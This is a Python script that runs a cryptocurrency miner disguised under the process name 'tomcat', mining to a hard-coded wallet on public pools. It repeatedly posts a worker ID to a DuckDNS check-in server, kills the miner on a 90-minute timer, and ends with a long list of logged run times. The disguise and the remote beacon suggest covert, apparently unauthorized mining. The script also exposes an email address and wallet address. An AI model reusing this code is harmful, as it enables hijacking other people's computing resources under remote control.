import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:07.023000
#2018-02-17 15:59:03.458188
#2018-02-17 17:47:04.360763
#2018-02-17 19:34:07.507289
#2018-02-17 21:23:04.650859
#2018-02-17 23:07:03.776939
#2018-02-18 00:54:07.022327
#2018-02-18 02:42:07.404720
#2018-02-18 04:31:03.896704
#2018-02-18 06:22:04.291539
#2018-02-18 08:11:04.434328
#2018-02-18 09:57:03.610958
#2018-02-18 11:45:06.848023
#2018-02-18 13:31:04.794683
#2018-02-18 15:21:01.871164
#2018-02-18 17:10:07.221729
#2018-02-18 18:58:07.590121
#2018-02-18 20:45:06.072674
#2018-02-18 22:31:01.912252
#2018-02-19 00:19:03.579427
#2018-02-19 02:05:06.425772
#2018-02-19 03:52:05.061260
#2018-02-19 05:37:07.600623
#2018-02-19 07:24:05.769755
#2018-02-19 09:13:08.142901
#2018-02-19 11:01:06.641431
#2018-02-19 12:50:01.320252
#2018-02-19 14:38:07.030986
#2018-02-19 16:25:08.666316
#2018-02-19 18:13:09.332601
#2018-02-19 20:01:01.784919
#2018-02-19 21:51:01.850636
#2018-02-19 23:36:06.986511
#2018-02-20 01:22:02.208110
#2018-02-20 03:12:07.747228
#2018-02-20 05:00:09.515562
#2018-02-20 06:44:02.065007
#2018-02-20 08:29:04.865117
#2018-02-20 10:14:08.120922
#2018-02-20 11:58:07.752984
#2018-02-20 13:46:04.414973
#2018-02-20 15:29:04.623936
#2018-02-20 17:16:07.970653
#2018-02-20 19:06:09.958408
#2018-02-20 20:54:07.550298
#2018-02-20 22:38:04.834606
#2018-02-21 00:21:07.023536
#2018-02-21 02:06:07.851487
#2018-02-21 03:54:03.810668
#2018-02-21 05:42:03.381840
#2018-02-21 07:30:07.602563
#2018-02-21 09:15:07.608892
#2018-02-21 11:03:08.632546
#2018-02-21 12:49:13.794797
#2018-02-21 14:37:02.153369
#2018-02-21 16:23:12.155599
#2018-02-21 18:14:01.368172
#2018-02-21 20:01:01.532248
#2018-02-21 21:49:06.069912
#2018-02-21 23:35:09.868444
#2018-02-22 01:23:04.873249
#2018-02-22 03:12:05.994904
#2018-02-22 04:57:07.878573
#2018-02-22 06:40:08.965396
#2018-02-22 08:29:02.187509
#2018-02-22 10:16:05.478489
#2018-02-22 12:01:04.011599
#2018-02-22 13:47:09.201580
#2018-02-22 15:35:06.251560
#2018-02-22 17:21:09.424040
#2018-02-22 19:08:01.590596
#2018-02-22 20:59:04.853821
#2018-02-22 22:45:05.203078
#2018-02-23 00:34:06.908962
#2018-02-23 02:20:09.032589
#2018-02-23 04:08:01.486034
#2018-02-23 05:56:01.899434
#2018-02-23 07:46:01.929017
#2018-02-23 09:51:05.553809
#2018-02-23 11:54:09.747449
#2018-02-23 13:44:15.603933
#2018-02-23 15:33:04.606485
#2018-02-23 17:23:07.407794
#2018-02-23 19:05:04.188662
#2018-02-23 20:39:06.839490
#2018-02-23 22:14:05.632181
#2018-02-23 23:47:05.782343
#2018-02-24 01:21:03.663629
#2018-02-24 02:57:05.067567
#2018-02-24 04:35:05.861266
#2018-02-24 06:03:05.431088
#2018-02-24 07:34:06.655324
#2018-02-24 09:11:07.129795
#2018-02-24 10:37:05.134625
#2018-02-24 12:23:06.177635
#2018-02-24 14:17:07.007010
#2018-02-24 16:03:07.424191
#2018-02-24 17:56:06.388157
#2018-02-24 19:44:01.607693
#2018-02-24 21:31:04.983281
#2018-02-25 01:50:08.494541
#2018-02-25 04:52:07.255393
#2018-02-25 08:15:02.136169